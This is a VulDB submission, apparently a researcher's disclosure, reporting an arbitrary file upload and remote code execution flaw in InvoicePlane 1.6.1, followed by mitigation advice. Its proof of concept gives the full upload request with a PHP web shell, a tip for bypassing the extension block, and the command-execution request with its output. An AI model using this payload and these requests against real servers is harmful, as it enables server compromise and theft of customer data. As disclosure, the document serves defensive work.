| Titel | InvoicePlane 1.6.1 Arbitrary File Upload & Remote Code Execution |
|---|
| Beschreibung | ## **Description**
InvoicePlane is an open-source, self-hosted application designed for managing invoices, clients, and payments. With over **1 million Docker downloads** and **6,000+ stars on GitHub**, it is widely adopted by small businesses and freelancers globally. This popularity makes the presence of critical vulnerabilities a significant risk for its user base.
A **Remote Code Execution (RCE)** vulnerability has been identified in the `upload_file` method of the `Upload` controller in InvoicePlane. This vulnerability allows an attacker to upload and execute malicious files on the server, potentially gaining full control over the application and its underlying infrastructure.
## **Vulnerability Overview**
The vulnerability stems from the absence of proper server-side validation when handling file uploads. The application does not validate the file type or inspect file contents, enabling an attacker to upload arbitrary files, including executable PHP scripts. Once uploaded, these scripts can be accessed via HTTP requests, allowing attackers to execute malicious commands directly on the server.
## **Impact**
This vulnerability is not limited to **arbitrary file uploads** but extends to the **execution of uploaded files**, which is significantly more severe. Exploitation of this flaw can lead to the following consequences:
- **Remote Code Execution (RCE)**: Attackers can execute arbitrary system commands on the server.
- **Full Server Compromise**: Attackers may install backdoors, steal sensitive data, or launch further attacks on internal infrastructure.
- **Data Breach**: Compromised customer and invoice data could have severe legal and financial repercussions.
- **Service Disruption**: Attackers could delete or corrupt data, rendering the application unusable.
## **Proof of Concept**
Below is a step-by-step demonstration of the exploitation of this vulnerability, with a detailed explanation of each request and response.
---
### **Step 1: Upload a Malicious PHP File**
**Request:**
```
POST /index.php/upload/upload_file/1/1 HTTP/1.1
Host: invoiceplane.docker.local
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: application/json
Content-Type: multipart/form-data; boundary=---------------------------36384644001432313523184586075
Cookie: ip_csrf_cookie=078ded7960cc209b04e3da75f2249b75; ip_session=76df458f09d570c7911a6de45fccb072e1bcfada
- ----------------------------36384644001432313523184586075
Content-Disposition: form-data; name="_ip_csrf"
078ded7960cc209b04e3da75f2249b75
-----------------------------36384644001432313523184586075
Content-Disposition: form-data; name="file"; filename="rce_test.php"
Content-Type: application/x-php
<?php echo shell_exec($_GET['cmd']); ?>
-----------------------------36384644001432313523184586075--
```
**Explanation:**
The `POST` request uploads a malicious PHP script (`rce_test.php`) to the server. Note that if “php” is backlisted, “php2”, “php3”, and so on are still successfully uploaded. The file contains the payload:
```
<?php echo shell_exec($_GET['cmd']); ?>
```
This payload allows the execution of system commands via the `cmd` GET parameter.
**Response:**
```
HTTP/1.1 200 OK
Content-Type: application/json
{
"success": true
}
```
**Explanation:**
The server responds with a JSON object confirming that the file upload was successful. The `"success": true` message indicates that no validation was performed, and the malicious file was stored on the server.
---
### **Step 2: Execute the Uploaded PHP File**
**Request:**
```
GET /uploads/customer_files/1_rce_test.php?cmd=ls HTTP/1.1
Host: invoiceplane.docker.local
```
**Explanation:**
The `GET` request accesses the uploaded PHP file (`1_rce_test.php`) and passes the command `ls` as a query parameter via `cmd`. The PHP script executes this command on the server and returns the output.
**Response:**
```
HTTP/1.1 200 OK
Content-Type: text/html
index.html
1_11.php
1_rce_test.php
1_test2.php
1_unique_file.php
...
```
**Explanation:**
The server executes the `ls` command and returns the list of files in the directory, including the malicious PHP file (`1_rce_test.php`). This confirms that the uploaded script is executable and capable of running arbitrary commands.
---
## **Mitigation Steps**
To remediate this critical issue, the following measures are recommended:
1. **File Type Validation**: Restrict file uploads to specific safe types (e.g., images, PDFs) using server-side MIME type checks.
2. **Content Validation**: Scan the contents of uploaded files using security libraries to detect and block malicious payloads.
3. **Execution Prevention**: Set upload directories to **non-executable** and restrict permissions to prevent the execution of uploaded files.
4. **CSRF Protection**: Properly implement and enforce CSRF protection to ensure file upload requests are authenticated.
5. **Input Sanitization**: Validate and sanitize all user inputs related to file uploads.
6. **Logging and Monitoring**: Log file uploads and monitor for suspicious activity to detect exploitation attempts. |
|---|
| Benutzer | Dan_AC (UID 78862) |
|---|
| Einreichung | 10.12.2024 03:38 (vor 2 Jahren) |
|---|
| Moderieren | 16.12.2024 10:33 (6 days later) |
|---|
| Status | Akzeptiert |
|---|
| VulDB Eintrag | 288538 [InvoicePlane bis 1.6.1 upload_file Datei erweiterte Rechte] |
|---|
| Punkte | 17 |
|---|